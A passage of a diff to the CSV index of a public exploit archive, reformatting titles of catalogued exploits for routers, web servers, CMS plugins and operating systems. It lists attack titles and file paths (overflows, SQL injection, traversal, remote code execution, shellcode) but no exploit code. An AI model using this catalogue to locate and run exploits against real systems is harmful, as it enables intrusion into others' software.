1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (3)",2000-05-16,L0pht,multiple,remote,0 19919,platforms/hardware/remote/19919.c,"Cisco 7xx Series Router DoS Vulnerability",1999-03-11,Tiz.Telesup,hardware,remote,0 19920,platforms/multiple/dos/19920.c,"Computalynx CProxy Server 3.3 SP2 Buffer Overflow DoS Vulnerability",2000-05-16,"HaCk-13 TeaM",multiple,dos,0 19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0 @@ -17266,7 +17264,7 @@ id,file,description,date,author,platform,type,port 19933,platforms/linux/local/19933.rb,"Linux Kernel Sendpage Local Privilege Escalation",2012-07-19,metasploit,linux,local,0 19937,platforms/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit",2012-07-19,mr.pr0n,windows,remote,0 19938,platforms/beos/dos/19938.txt,"BeOS 5.0 TCP Fragmentation Remote DoS Vulnerability",2000-05-18,visi0n,beos,dos,0 -19939,platforms/windows/remote/19939.html,"Internet Explorer 4.0/5.0/5.5 preview/5.0.1 DocumentComplete() Cross Frame Access Vulnerability",2000-05-17,"Andrew Nosenko",windows,remote,0 +19939,platforms/windows/remote/19939.html,"Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access Vulnerability",2000-05-17,"Andrew Nosenko",windows,remote,0 19940,platforms/windows/dos/19940.c,"Axent NetProwler 3.0 Malformed IP Packets DoS Vulnerability (1)",2000-05-18,"rain forest puppy",windows,dos,0 19941,platforms/windows/dos/19941.casl,"Axent NetProwler 3.0 Malformed IP Packets DoS Vulnerability (2)",2000-05-18,"Pedro Quintanilha",windows,dos,0 19942,platforms/windows/remote/19942.txt,"Fortech Proxy+ 2.30 Remote Administration Vulnerability",1999-12-26,Anonymous,windows,remote,0 @@ -17283,7 +17281,7 @@ id,file,description,date,author,platform,type,port 19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0,Slackware 3.x/4.0,Turbolinux 6,OpenLinux 7.0 fdmount Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0 19954,platforms/linux/local/19954.c,"S.u.S.E. 4.x/5.x/6.x/7.0,Slackware 3.x/4.0,Turbolinux 6,OpenLinux 7.0 fdmount Buffer Overflow (3)",2000-05-22,WaR,linux,local,0 19955,platforms/linux/local/19955.c,"Cobalt RaQ 2.0/3.0,qpopper 2.52/2.53 'EUIDL' Format String Input Vulnerability",2000-05-24,Prizm,linux,local,0 -19956,platforms/cgi/remote/19956.txt,"HP JetAdmin 5.5.177/JetAdmin 5.6 Directory Traversal Vulnerability",2000-05-24,"Ussr Labs",cgi,remote,8000 +19956,platforms/cgi/remote/19956.txt,"hp jetadmin 5.5.177/jetadmin 5.6 - Directory Traversal vulnerability",2000-05-24,"Ussr Labs",cgi,remote,8000 19957,platforms/windows/remote/19957.txt,"Pacific Software Carello 1.2.1 File Duplication and Source Disclosure Vulnerability",2000-05-24,"Cerberus Security Team",windows,remote,0 19958,platforms/windows/remote/19958.rb,"Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow",2012-07-20,metasploit,windows,remote,0 19959,platforms/windows/remote/19959.rb,"Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow",2012-07-20,metasploit,windows,remote,998 @@ -17336,9 +17334,9 @@ id,file,description,date,author,platform,type,port 20006,platforms/windows/remote/20006.nasl,"Windows NT 4.0 Remote Registry Request Dos Vulnerability (2)",2000-06-08,"Renaud Deraison",windows,remote,0 20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 userreg.cgi Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0 20008,platforms/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote,0 -20009,platforms/linux/remote/20009.py,"Atmail Email Server Appliance 6.4 Stored XSS - CSRF - RCE",2012-07-21,muts,linux,remote,0 +20009,platforms/linux/remote/20009.py,"atmail email server appliance 6.4 - Stored XSS - csrf - rce",2012-07-21,muts,linux,remote,0 20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0 -20011,platforms/windows/webapps/20011.js,"SolarWinds Orion Network Performance Monitor 10.2.2 Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 +20011,platforms/windows/webapps/20011.js,"solarwinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 20012,platforms/windows/local/20012.txt,"Computer Associates eTrust Intrusion Detection 1.4.1 .13 Weak Encryption Vulnerability",2000-06-07,Phate.net,windows,local,0 20013,platforms/linux/local/20013.c,"Sam Lantinga splitvt 1.6.3 Buffer Overflow Vulnerability",2000-06-01,Syzop,linux,local,0 20014,platforms/solaris/local/20014.c,"Solaris 2.5/2.6/7.0/8 ufsrestore Buffer Overflow Vulnerability",2000-06-14,"Job de Haas of ITSX",solaris,local,0 @@ -17349,7 +17347,7 @@ id,file,description,date,author,platform,type,port 20019,platforms/windows/remote/20019.txt,"Cart32 3.0 ""expdate"" Administrative Information Disclosure Vulnerability",2000-05-03,cassius,windows,remote,0 20020,platforms/windows/dos/20020.txt,"Alt-N MDaemon 2.8.5 0 UIDL DoS Vulnerability",2000-06-16,Craig,windows,dos,0 20021,platforms/linux/local/20021.txt,"RedHat 6.2 Piranha Virtual Server Package Plaintext Password Vulnerability",2000-06-09,arkth,linux,local,0 -20022,platforms/windows/local/20022.txt,"HM Software S to Infinity 3.0 Multiple Vulnerabilities",2000-06-15,Synapt1c,windows,local,0 +20022,platforms/windows/local/20022.txt,"HM Software S to Infinity 3.0 - Multiple Vulnerabilities",2000-06-15,Synapt1c,windows,local,0 20023,platforms/linux/dos/20023.c,"Gnome 1.0/1.1,Group X 11.0,XFree86 X11R6 3.3.x/4.0 Denial of Service",2000-06-19,"Chris Evans",linux,dos,0 20024,platforms/linux/local/20024.c,"Mandrake 7.0/7.1,RedHat Kon2 0.3.9 fld Input File Overflow",2000-08-01,E-Ligth,linux,local,0 20025,platforms/linux/dos/20025.txt,"Debian 2.1/2.2,Mandrake 6.0/6.1/7.0,RedHat 6.x rpc.lockd Remote Denial Of Service",2000-06-08,"Mike Murray",linux,dos,0 @@ -17361,7 +17359,7 @@ id,file,description,date,author,platform,type,port 20031,platforms/linux/remote/20031.c,"wu-ftpd 2.4.2/2.5 .0/2.6 .0 Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0 20032,platforms/lin_x86/remote/20032.txt,"wu-ftpd 2.4.2/2.5 .0/2.6 .0 Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0 20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0 -20035,platforms/asp/webapps/20035.js,"Ipswitch WhatsUp Gold 15.02 Stored XSS - Blind SQLi - RCE",2012-07-22,muts,asp,webapps,0 +20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Stored XSS - blind sqli - rce",2012-07-22,muts,asp,webapps,0 20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow Exploit",2012-07-23,mr.pr0n,windows,local,0 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0 20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0 @@ -17388,14 +17386,14 @@ id,file,description,date,author,platform,type,port 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 ""/INVITE"" Format String Vulnerability",2000-07-05,RaiSe,linux,remote,0 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 Remote Buffer Overflow Vulnerability",2000-07-02,UNYUN,linux,remote,0 20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0 -20063,platforms/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 Stored XSS and Post-Auth SQL Injection",2012-07-23,dookie,windows,webapps,0 +20063,platforms/windows/webapps/20063.txt,"spiceworks 5.3.75941 - Stored XSS and post-auth sql injection",2012-07-23,dookie,windows,webapps,0 20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit",2012-07-24,muts,linux,remote,0 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 File Existence Disclosure Vulnerability",2000-07-08,"Andrew Lewis",windows,remote,0 20066,platforms/windows/remote/20066.java,"Michael Lamont Savant WebServer 2.1/3.0 Buffer Overflow Vulnerability",2000-07-03,Wizdumb,windows,remote,0 20067,platforms/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 Forged TCP RST Vulnerability",2000-07-10,"Citec Network Securities",hardware,remote,0 20068,platforms/cgi/remote/20068.txt,"Sean MacGuire Big Brother 1.x Directory Traversal Vulnerability",2000-07-11,"Eric Hines",cgi,remote,0 20069,platforms/windows/dos/20069.pl,"Texas Imperial Software WFTPD 2.4.1 RNTO Denial of Service Vulnerability",2000-07-11,"Blue Panda",windows,dos,0 -20070,platforms/windows/remote/20070.txt,"Alt-N WorldClient Standard 2.1 Directory Traversal Vulnerability",2000-07-12,"Rikard Carlsson",windows,remote,0 +20070,platforms/windows/remote/20070.txt,"alt-n worldclient standard 2.1 - Directory Traversal vulnerability",2000-07-12,"Rikard Carlsson",windows,remote,0 20071,platforms/cgi/dos/20071.c,"Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a Remote DoS Attack Vulnerability",2000-03-10,"Charles Chear",cgi,dos,0 20072,platforms/novell/dos/20072.txt,"Novell Netware 5.0 SP5/6.0 SP1 SMDR.NLM Denial of Service Vulnerability",2000-07-11,"Dimuthu Parussalla",novell,dos,0 20073,platforms/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 insecure perl ""open"" Vulnerability",2000-07-12,"Joey Hess",unix,local,0 @@ -17408,7 +17406,7 @@ id,file,description,date,author,platform,type,port 20080,platforms/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 DoS Vulnerability",2000-07-18,wildcoyote,windows,dos,0 20081,platforms/windows/local/20081.c,"NetZero ZeroPort 3.0 Weak Encryption Method Vulnerability",2000-07-18,"Brian Carrier",windows,local,0 20082,platforms/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 Remote File Read Vulnerability",2000-07-14,mandark,unix,remote,0 -20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0 +20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload 0.5.4.4 - Arbitrary PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0 20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 Piped Command Vulnerability",2000-07-18,Prizm,cgi,remote,0 20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0 20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 and Earlier Session Extractor 0day",2012-07-24,muts,php,webapps,0 @@ -17427,7 +17425,7 @@ id,file,description,date,author,platform,type,port 20100,platforms/windows/dos/20100.pl,"WFTPD 2.4.1RC11 STAT/LIST Command DoS",2000-07-21,"Blue Panda",windows,dos,0 20101,platforms/windows/dos/20101.pl,"WFTPD 2.4.1RC11 REST Command Malformed File Write DoS",2000-07-21,"Blue Panda",windows,dos,0 20102,platforms/windows/dos/20102.pl,"WFTPD 2.4.1RC11 Unauthenticated MLST Command Remote DoS",2000-07-21,"Blue Panda",windows,dos,0 -20103,platforms/windows/remote/20103.txt,"AnalogX SimpleServer:WWW 1.0.6 Directory Traversal Vulnerability",2000-07-26,"Foundstone Inc.",windows,remote,0 +20103,platforms/windows/remote/20103.txt,"analogx simpleserver:www 1.0.6 - Directory Traversal vulnerability",2000-07-26,"Foundstone Inc.",windows,remote,0 20104,platforms/multiple/remote/20104.txt,"Roxen WebServer 2.0 .X %00 Request File/Directory Disclosure Vulnerability",2000-07-21,zorgon,multiple,remote,0 20105,platforms/linux/remote/20105.txt,"Conectiva 4.x/5.x,RedHat 6.x pam_console Remote User Vulnerability",2000-07-27,bkw1a,linux,remote,0 20106,platforms/windows/remote/20106.cpp,"Microsoft Windows NT 4/2000 NetBIOS Name Conflict Vulnerability",2000-08-01,"Sir Dystic",windows,remote,0 @@ -17452,7 +17450,7 @@ id,file,description,date,author,platform,type,port 20132,platforms/multiple/remote/20132.txt,"Tomcat 3.0/3.1 Snoop Servlet Information Disclosure Vulnerability",2000-07-20,"ET LoWNOISE",multiple,remote,0 20133,platforms/windows/local/20133.cpp,"Microsoft Windows 2000 Named Pipes Predictability Vulnerability",2000-08-01,Maceo,windows,local,0 20134,platforms/windows/remote/20134.pl,"NAI Net Tools PKI Server 1.0 strong.exe Buffer Overflow Vulnerability",2000-08-02,juliano,windows,remote,0 -20135,platforms/windows/remote/20135.txt,"NAI Net Tools PKI Server 1.0 Directory Traversal Vulnerability",2000-08-02,"Juliano Rizzo",windows,remote,0 +20135,platforms/windows/remote/20135.txt,"nai net tools pki server 1.0 - Directory Traversal vulnerability",2000-08-02,"Juliano Rizzo",windows,remote,0 20136,platforms/windows/remote/20136.txt,"NAI Net Tools PKI Server 1.0 Format String Vulnerability",2000-08-02,"Juliano Rizzo",windows,remote,0 20137,platforms/irix/local/20137.c,"IRIX 6.2/6.3/6.4 xfs truncate() Privilege Check Vulnerability",1997-02-01,"Last Stage of Delirium",irix,local,0 20138,platforms/irix/local/20138.c,"IRIX 5.3/6.x mail Vulnerability",1997-09-01,"Last Stage of Delirium",irix,local,0 @@ -17473,7 +17471,7 @@ id,file,description,date,author,platform,type,port 20153,platforms/unix/local/20153.c,"David Bagley xlock 4.16 User Supplied Format String Vulnerability (1)",2000-08-15,noir,unix,local,0 20154,platforms/unix/local/20154.c,"David Bagley xlock 4.16 User Supplied Format String Vulnerability (2)",2000-10-21,"Ben Williams",unix,local,0 20155,platforms/linux/local/20155.txt,"Multisoft FlagShip 4.4 Installation Permission Vulnerability",2000-08-10,Narrow,linux,local,0 -20156,platforms/cgi/remote/20156.txt,"NetWin Netauth 4.2 Directory Traversal Vulnerability",2000-08-17,"Marc Maiffret",cgi,remote,0 +20156,platforms/cgi/remote/20156.txt,"netwin netauth 4.2 - Directory Traversal vulnerability",2000-08-17,"Marc Maiffret",cgi,remote,0 20157,platforms/linux/remote/20157.c,"UMN Gopherd 2.x Halidate Function Buffer Overflow Vulnerability",2000-08-20,"Chris Sharp",linux,remote,0 20158,platforms/php/webapps/20158.txt,"PHP-Nuke 1.0/2.5 Administrative Privileges Vulnerability",2000-08-21,bruj0,php,webapps,0 20159,platforms/linux/remote/20159.c,"Darxite 0.4 Login Buffer Overflow Vulnerability",2000-08-22,Scrippie,linux,remote,0 @@ -17487,7 +17485,7 @@ id,file,description,date,author,platform,type,port 20167,platforms/linux/dos/20167.txt,"eGlibc Signedness Code Execution Vulnerability",2012-08-01,c0ntex,linux,dos,0 20168,platforms/php/remote/20168.pl,"pBot Remote Code Execution",2012-08-01,bwall,php,remote,0 20170,platforms/php/webapps/20170.txt,"Joomla Movm Extension (com_movm) SQL Injection",2012-08-01,D4NB4R,php,webapps,0 -20171,platforms/php/webapps/20171.txt,"ManageEngine Application Manager 10 Multiple Vulnerabilities",2012-08-01,Vulnerability-Lab,php,webapps,0 +20171,platforms/php/webapps/20171.txt,"ManageEngine Application Manager 10 - Multiple Vulnerabilities",2012-08-01,Vulnerability-Lab,php,webapps,0 20172,platforms/php/webapps/20172.txt,"ManageEngine Mobile Application Manager 10 - SQL Injection",2012-08-01,Vulnerability-Lab,php,webapps,0 20173,platforms/php/webapps/20173.rb,"WebPageTest Arbitrary PHP File Upload",2012-08-02,metasploit,php,webapps,0 20174,platforms/windows/remote/20174.rb,"Microsoft Internet Explorer Fixed Table Col Span Heap Overflow",2012-08-02,metasploit,windows,remote,0 @@ -17513,7 +17511,7 @@ id,file,description,date,author,platform,type,port 20194,platforms/cgi/remote/20194.pl,"CGI Script Center Auction Weaver 1.0.2 Remote Command Execution Vulnerability",2000-08-30,teleh0r,cgi,remote,0 20195,platforms/lin_x86/shellcode/20195.c,"Linux x86 ASLR deactivation - 83 bytes",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 20196,platforms/lin_x86/shellcode/20196.c,"Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 -20197,platforms/php/webapps/20197.txt,"Joomla joomgalaxy 1.2.0.4 Multiple Vulnerabilities",2012-08-02,D4NB4R,php,webapps,0 +20197,platforms/php/webapps/20197.txt,"joomla joomgalaxy 1.2.0.4 - Multiple Vulnerabilities",2012-08-02,D4NB4R,php,webapps,0 20198,platforms/php/webapps/20198.txt,"am4ss <= 1.2 - Multiple Vulnerabilities",2012-08-02,s3n4t00r,php,webapps,0 20199,platforms/php/webapps/20199.php,"am4ss Support System 1.2 PHP Code Injection Exploit",2012-08-02,i-Hmx,php,webapps,0 20201,platforms/linux/local/20201.c,"Nvidia Linux Driver Privilege Escalation",2012-08-02,Anonymous,linux,local,0 @@ -17522,7 +17520,7 @@ id,file,description,date,author,platform,type,port 20205,platforms/unix/remote/20205.rb,"Zenoss 3 showDaemonXMLConfig Command Execution",2012-08-03,metasploit,unix,remote,8080 20206,platforms/multiple/remote/20206.txt,"QSSL Voyager 2.0 1B Arbitrary File Access",2000-09-01,neonbunny,multiple,remote,0 20207,platforms/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B .photon Directory Information Disclosure",2000-09-01,neonbunny,multiple,remote,0 -20208,platforms/php/webapps/20208.txt,"Nathan Purciful phpPhotoAlbum 0.9.9 Directory Traversal Vulnerability",2000-09-07,pestilence,php,webapps,0 +20208,platforms/php/webapps/20208.txt,"nathan purciful phpphotoalbum 0.9.9 - Directory Traversal vulnerability",2000-09-07,pestilence,php,webapps,0 20209,platforms/windows/local/20209.cpp,"Microsoft Windows 2000 Still Image Service Privilege Escalation Vulnerability",2000-09-06,dildog,windows,local,0 20210,platforms/linux/remote/20210.txt,"Apache 1.3.12 WebDAV Directory Listings Vulnerability",2000-09-07,Mnemonix,linux,remote,0 20211,platforms/windows/remote/20211.c,"Mobius DocumentDirect for the Internet 1.2 Buffer Overflow Vulnerabilities",2000-09-08,wildcoyote,windows,remote,0 @@ -17538,7 +17536,7 @@ id,file,description,date,author,platform,type,port 20221,platforms/windows/dos/20221.pl,"Jack De Winter WinSMTP 1.6 f/2.0 Buffer Overflow Vulnerability",2000-09-11,"Guido Bakker",windows,dos,0 20222,platforms/windows/remote/20222.cpp,"Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability",2000-08-14,@stake,windows,remote,0 20223,platforms/windows/remote/20223.txt,"Sambar Server 4.3/4.4 beta 3 Search CGI Vulnerability",2000-09-15,dethy,windows,remote,0 -20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial Version Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0 +20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0 20225,platforms/windows/remote/20225.pl,"Alt-N MDaemon 3.1.1 DoS Vulnerability",1999-12-01,"Ussr Labs",windows,remote,0 20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel SCTP Remote NULL Ptr Dereference DoS",2012-08-03,"Shaun Colley",freebsd,dos,0 20228,platforms/windows/dos/20228.pl,"TYPSoft 0.7 x FTP Server remote DoS Vulnerability",1999-06-08,dethy,windows,dos,0 @@ -17547,7 +17545,7 @@ id,file,description,date,author,platform,type,port 20231,platforms/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x SMTP Content Filtering Evasion Vulnerability",2000-09-19,"Lincoln Yeoh",hardware,remote,0 20232,platforms/windows/local/20232.cpp,"MS Windows 2000/NT 4 DLL Search Path Weakness",2000-09-18,"Georgi Guninski",windows,local,0 20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 DoS Vulnerability",2000-09-21,"Delphis Consulting",windows,dos,0 -20234,platforms/multiple/remote/20234.txt,"Extent Technologies RBS ISP 2.5 Directory Traversal Vulnerability",2000-09-21,anon,multiple,remote,8002 +20234,platforms/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal vulnerability",2000-09-21,anon,multiple,remote,8002 20235,platforms/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 Buffer Overflow Vulnerability",2000-09-21,blackangels,windows,remote,0 20236,platforms/linux/remote/20236.txt,"S.u.S.E. Linux 6.3/6.4 Installed Package Disclosure Vulnerability",2000-09-21,t0maszek,linux,remote,0 20237,platforms/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 ""From:"" Field Buffer Overflow Vulnerability",2000-09-23,Arkane,linux,remote,0 @@ -17573,14 +17571,14 @@ id,file,description,date,author,platform,type,port 20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0 20258,platforms/multiple/remote/20258.c,"HP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0 20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution (2)",1994-02-07,Anonymous,multiple,remote,0 -20260,platforms/php/webapps/20260.txt,"Islamnt Islam Forum Script 1.2 Blind SQL Injection Exploit",2012-08-05,s3n4t00r,php,webapps,0 +20260,platforms/php/webapps/20260.txt,"Islamnt Islam Forum Script 1.2 - Blind SQL Injection Exploit",2012-08-05,s3n4t00r,php,webapps,0 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 Buffer Overflow ASLR bypass",2012-08-05,pole,windows,local,0 20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 permissions File Manipulation Vulnerability",1995-03-02,"Larry Glaze",irix,local,0 20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability",2000-10-03,"BindView's Razor Team",windows,local,0 20266,platforms/windows/remote/20266.txt,"MS Virtual Machine 2000/3100/3200/3300 Series com.ms.activeX.ActiveXComponent Arbitrary Program Execution",2000-10-05,"Marcin Jackowski",windows,remote,0 20268,platforms/php/webapps/20268.txt,"Tickets CAD 2.20G Multiple Vulnerabilities",2012-08-05,chap0,php,webapps,0 20269,platforms/windows/remote/20269.txt,"Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability",2000-10-04,"David Litchfield",windows,remote,0 -20270,platforms/php/webapps/20270.txt,"WP Effective Lead Management 3.0.0 - Persistent XSS",2012-08-05,"Chris Kellum",php,webapps,0 +20270,platforms/php/webapps/20270.txt,"Wordpress Plugin Effective Lead Management 3.0.0 - Persistent XSS",2012-08-05,"Chris Kellum",php,webapps,0 20271,platforms/openbsd/dos/20271.c,"OpenBSD 2.x Pending ARP Request Remote DoS Vulnerability",2000-10-05,skyper,openbsd,dos,0 20272,platforms/windows/dos/20272.pl,"Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability",1998-08-02,L.Facq,windows,dos,0 20273,platforms/cgi/remote/20273.txt,"Moreover CGI script 0 File Disclosure Vulnerability",2000-10-02,CDI,cgi,remote,0 @@ -17588,10 +17586,10 @@ id,file,description,date,author,platform,type,port 20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal 'iplncal.sh' Permissions Vulnerability",2000-10-10,@stake,solaris,local,0 20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal 'csstart' Vulnerability",2000-10-10,@stake,solaris,local,0 20277,platforms/cgi/remote/20277.txt,"Armada Design Master Index 1.0 Path Traversal Vulnerability",2000-07-18,pestilence,cgi,remote,0 -20278,platforms/php/webapps/20278.txt,"PHPix 1.0 Directory Traversal Vulnerability",2000-10-07,Synnergy.net,php,webapps,0 -20279,platforms/cgi/remote/20279.txt,"Extropia WebStore 1.0/2.0 Directory Traversal Vulnerability",2000-10-09,f0bic,cgi,remote,0 -20280,platforms/cgi/remote/20280.txt,"Bytes Interactive Web Shopper 1.0/2.0 Directory Traversal Vulnerability",2000-10-08,f0bic,cgi,remote,0 -20281,platforms/cgi/remote/20281.txt,"Hassan Consulting Shopping Cart 1.18 Directory Traversal Vulnerability",2000-10-07,f0bic,cgi,remote,0 +20278,platforms/php/webapps/20278.txt,"phpix 1.0 - Directory Traversal vulnerability",2000-10-07,Synnergy.net,php,webapps,0 +20279,platforms/cgi/remote/20279.txt,"extropia webstore 1.0/2.0 - Directory Traversal vulnerability",2000-10-09,f0bic,cgi,remote,0 +20280,platforms/cgi/remote/20280.txt,"bytes interactive web shopper 1.0/2.0 - Directory Traversal vulnerability",2000-10-08,f0bic,cgi,remote,0 +20281,platforms/cgi/remote/20281.txt,"hassan consulting shopping cart 1.18 - Directory Traversal vulnerability",2000-10-07,f0bic,cgi,remote,0 20282,platforms/windows/dos/20282.pl,"Evolvable Shambala Server 4.5 DoS Vulnerability",2000-10-09,zillion,windows,dos,0 20283,platforms/windows/remote/20283.txt,"Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (1)",2000-10-10,stickler,windows,remote,0 20284,platforms/windows/remote/20284.txt,"Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (2)",2000-10-10,"Gabriel Maggiotti",windows,remote,0 @@ -17634,7 +17632,7 @@ id,file,description,date,author,platform,type,port 20321,platforms/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution",2012-08-08,metasploit,windows,remote,0 20322,platforms/multiple/remote/20322.html,"Sun HotJava Browser 3 Arbitrary DOM Access Vulnerability",2000-10-25,"Georgi Guninski",multiple,remote,0 20323,platforms/hardware/remote/20323.txt,"Cisco IOS 12 Software ""?/"" HTTP Request DoS Vulnerability",2000-10-25,"Alberto Solino",hardware,remote,0 -20324,platforms/windows/remote/20324.txt,"iPlanet Certificate Management System 4.2 for Windows NT 4.0 Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0 +20324,platforms/windows/remote/20324.txt,"iplanet certificate management system 4.2 for windows nt 4.0 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0 20325,platforms/windows/remote/20325.txt,"Netscape Directory Server 4.12 Directory Server Directory Traversal Vulnerability",2000-10-25,CORE-SDI,windows,remote,0 20326,platforms/unix/local/20326.sh,"ntop 1.x -i Local Format String Vulnerability",2000-10-18,"Paul Starzetz",unix,local,0 20327,platforms/unix/remote/20327.txt,"GNU Ffingerd 1.19 Username Validity Disclosure Vulnerability",1999-08-23,"Eilon Gishri",unix,remote,0 @@ -17652,32 +17650,32 @@ id,file,description,date,author,platform,type,port 20339,platforms/linux/local/20339.sh,"SAMBA 2.0.7 SWAT Symlink Vulnerability (2)",2000-11-01,optyx,linux,local,0 20340,platforms/unix/remote/20340.c,"SAMBA 2.0.7 SWAT Logging Failure Vulnerability",2000-11-01,dodeca-T,unix,remote,0 20341,platforms/linux/local/20341.sh,"SAMBA 2.0.7 SWAT Logfile Permissions Vulnerability",2000-11-01,miah,linux,local,0 -20342,platforms/php/webapps/20342.php,"WespaJuris <= 3.0 Multiple Vulnerabilities",2012-08-08,WhiteCollarGroup,php,webapps,0 +20342,platforms/php/webapps/20342.php,"WespaJuris <= 3.0 - Multiple Vulnerabilities",2012-08-08,WhiteCollarGroup,php,webapps,0 20343,platforms/php/webapps/20343.pl,"Joomla En Masse Component 1.2.0.4 SQL Injection",2012-08-08,D4NB4R,php,webapps,0 20344,platforms/php/webapps/20344.php,"AraDown Blind SQL Injection",2012-08-08,G-B,php,webapps,0 -20345,platforms/php/webapps/20345.txt,"iAuto Mobile Application 2012 Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps,0 +20345,platforms/php/webapps/20345.txt,"iauto mobile application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps,0 20346,platforms/php/webapps/20346.txt,"Inout Mobile Webmail APP Persistent XSS Vulnerability",2012-08-08,Vulnerability-Lab,php,webapps,0 20347,platforms/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 \'id\' Parameter Multiple SQL Injection",2012-08-08,"Lorenzo Cantoni",php,webapps,0 -20348,platforms/windows/webapps/20348.py,"Axigen Mail Server 8.0.1 Stored XSS",2012-08-08,loneferret,windows,webapps,0 -20349,platforms/windows/webapps/20349.py,"EmailArchitect Enterprise Email Server 10.0 Stored XSS",2012-08-08,loneferret,windows,webapps,0 -20350,platforms/windows/webapps/20350.py,"ESCON SupportPortal Pro 3.0 Stored XSS",2012-08-08,loneferret,windows,webapps,0 -20351,platforms/windows/webapps/20351.py,"MailEnable Enterprise 6.5 Stored XSS",2012-08-08,loneferret,windows,webapps,0 -20352,platforms/windows/webapps/20352.py,"AfterLogic Mailsuite Pro (VMware Appliance) 6.3 Stored 